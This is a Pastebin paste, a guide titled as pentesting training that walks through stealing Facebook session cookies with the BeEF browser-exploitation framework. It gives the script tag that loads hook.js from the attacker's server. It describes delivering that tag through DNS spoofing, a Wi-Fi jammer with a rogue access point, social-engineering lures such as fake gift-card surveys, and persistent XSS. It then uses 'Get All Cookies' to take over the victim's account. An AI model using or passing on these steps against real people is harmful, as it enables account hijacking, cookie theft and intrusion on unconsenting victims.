API tools faq
paste
Advertisement
--DSR--

X: #optraining facebook hacking

--DSR--
May 5th, 2017
122
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.59 KB | None | 0 0
raw download clone embed print report
  1.  
  2. /////////////////|||||||||||||||||||||||||||||||||||||\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  3.  
  4. 1 written by THEOFFSPRING
  5.  
  6.  
  7. ----- #optraining Facebook hacking with BeEF -----
  8.  
  9. Introduction:
  10. __________________
  11.  
  12. This guide is written as part of PenTesting challenge.
  13. It's aimed for all those that come crying for help with hacking the Facebook,
  14. hopefully it will lead you to wonderful land of pentesting.
  15.  
  16.  
  17. Requirements:
  18. __________________
  19.  
  20. Only requirement for this guide is that you have BeFF installed, if you are using Kali you already have it pre-installed.
  21. For Kali: (Applications->Exploitation Tools->BeEF)
  22.  
  23.  
  24. Browser Exploitation Framework:
  25. __________________
  26.  
  27. BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
  28.  
  29. Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration
  30. tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks,
  31. BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door:
  32. the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further
  33. attacks against the system from within the browser context.
  34.  
  35. Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
  36. Browser Exploitation Framework (BeEF) - http://beefproject.com
  37.  
  38.  
  39. The guide:
  40. __________________
  41.  
  42. In this guide I won't go in depth how to use the tool, I'm just going to show you how to hook a browser and get all the cookies.
  43. Start by starting BeEEF service and navigating to its web server (localhost:3000). The default credentials are beef:beef.
  44.  
  45. Now we got our service started and logged in, we are ready to start using this powerful tool! From the web server you'll have access
  46. to all needed informations, all 'hooked' browsers and logs. So far we haven't infected anyone so the list will be empty.
  47. The key to hacking Facebook via BeEF is hooking a browser, which means we get victim to execute our code. Getting a victim to visit
  48. vulnerable web application. Our script will inject the code to the victim which responds to commands we send from our BeEF server.
  49.  
  50. Don't worry you won't have to do any scripting yourself, BeEF has JavaScript file 'hook.js', we just need to get victim to execute it,
  51. this is the trickiest part where you need to get creative. You can use Social Engineering, XSS, spoofing etc...
  52.  
  53. If you are on same network as the victim you can do DNS spoofing and get our victim to visit our malicious site which will look legit,
  54. beside the fact it will have simple script inside:
  55. <script src="http://[local_ip]:3000/hook.js"></scrip>
  56. (If you don't know your local_ip just tupe "ifconfig" in terminal)
  57.  
  58. However if the victim isn't on our network but in the WiFi range we can fire up WiFi jammer (aireplay-ng, or wifijammer from
  59. https://github.com/DanMcInerney/wifijammer), and start Rouge AP with common name so our victim will automatically connect. All we need
  60. to in that case is to once again place the code above in our home page. We can also use tool for all this called wifiphisher from here
  61. https://github.com/wifiphisher/wifiphisher
  62.  
  63. Last scenario is that our victim is far away so we have to do it online. Once again we just need to get the victim to execute that code
  64. once, with simple web page we can use Social Engineering and ask the victim to check out our site, offer free Gift Cards for short survey
  65. on the site, etc..I really can't go into much details here because it depense on the situation, do a little intel before the attack and
  66. you shouldn't have any problems getting victim to visit your site.
  67.  
  68. Beside spoofing and Social Engineering we can use persistent XSS, if we manage to place our code on vulnerable site everyone who visit
  69. that (trusted) site will get 'infected' (hooked).
  70.  
  71.  
  72. Once you've hooked the victim's browser you will be able to access it via BeFF web server, once again you don't have to write any payloads
  73. yourself, there are prebuild commands we can exeute. Right now we have unlimited possibilities we can do but you're just interested in
  74. hacking fucking Facebook so let's do that. You'll need to choose "Get All Cookies". It will send command to the browser which will reply
  75. with all the cookies it has. You have successfully hacked someone's Facebook, now play around with other options it has.
  76. ------------------------------------------------------------------------------------------------------------------
  77.  
  78. ...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!